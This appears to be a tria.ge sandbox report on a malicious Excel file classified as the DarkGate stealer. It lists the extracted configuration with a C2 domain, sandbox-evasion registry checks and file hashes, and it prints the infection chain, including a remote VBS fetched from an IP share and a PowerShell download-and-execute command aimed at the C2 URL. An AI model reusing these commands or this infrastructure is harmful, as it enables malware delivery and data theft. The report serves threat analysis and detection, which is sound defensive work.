Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/02/2024, 15:50
Static task
static1
Behavioral task
behavioral1
Sample
scan-28-02-24_3136.xlsx
Resource
win7-20240221-en
General
-
Target
scan-28-02-24_3136.xlsx
-
Size
29KB
-
MD5
9d51efbfb3733f9e41a3ca833eecd843
-
SHA1
bfb4462b184d7cde4d382dd4104b721ac4b4ab8f
-
SHA256
abadc5f79d85d395c7760c93d635c885f4ea7cdf872986332c650ffbf2ad9984
-
SHA512
955a1d6a7173dcac1d44374923530ca106d83afd7aa24b0aecd246b83d7cc94ea88b26f858717db858ef987769c1152ef79e18674c36699de3eca305519cbfa8
-
SSDEEP
768:wnEQpllh7tAafroiianGoHoJ+yWWn0WhtEk:nQJh7Lro4ntD+0AEk
Malware Config
Extracted
darkgate
admin888
cayennesxque.boo
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
HwHLLNLY
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/3732-63-0x0000000005840000-0x0000000005B8F000-memory.dmp family_darkgate_v6 behavioral2/memory/3732-65-0x0000000005840000-0x0000000005B8F000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2176 3448 WScript.exe 37 -
Blocklisted process makes network request 4 IoCs
flow pid Process 40 4148 powershell.exe 42 4148 powershell.exe 43 4148 powershell.exe 53 4148 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 3732 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3448 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4148 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE 3448 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3448 wrote to memory of 2176 3448 EXCEL.EXE 96 PID 3448 wrote to memory of 2176 3448 EXCEL.EXE 96 PID 2176 wrote to memory of 4148 2176 WScript.exe 97 PID 2176 wrote to memory of 4148 2176 WScript.exe 97 PID 4148 wrote to memory of 3732 4148 powershell.exe 100 PID 4148 wrote to memory of 3732 4148 powershell.exe 100 PID 4148 wrote to memory of 3732 4148 powershell.exe 100
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_3136.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/jzpdvxcn')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3732
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
472KB
MD58e60a79c1b465ab143888b66f90cf5d6
SHA1b1177d88a91017bae0e2aafbf5d19acd505179bf
SHA256a08fc871fc74e01e2d877a4ba7aefc4951363d3b31fa5f6df4c03a33734107a6
SHA512847da6254f3c7d51e3f7d39a13afab22f64272451be1c7d2df3df916e0df406bc0d6ab1b5623d777fddba715dfae0abe93c6cf5cef3eb173fd73aee888c767e8
-
Filesize
76B
MD5b7b976bcbbca1facd2941f6bdf2cb51e
SHA112a5b518283d72f43e73850327bf81d9456d8cc6
SHA2560de3c9bae4138c45d98519686256df51f4f5724ff3483552fcb873403415c812
SHA512e055a38ffb8d70b441e58dfb7d748f197bf631ae4f5da1c8a9398a6d2b06a70ea7087d6756229b57ffc9e28aecebf7c2cd340c6cae91e726333450668c1dfa80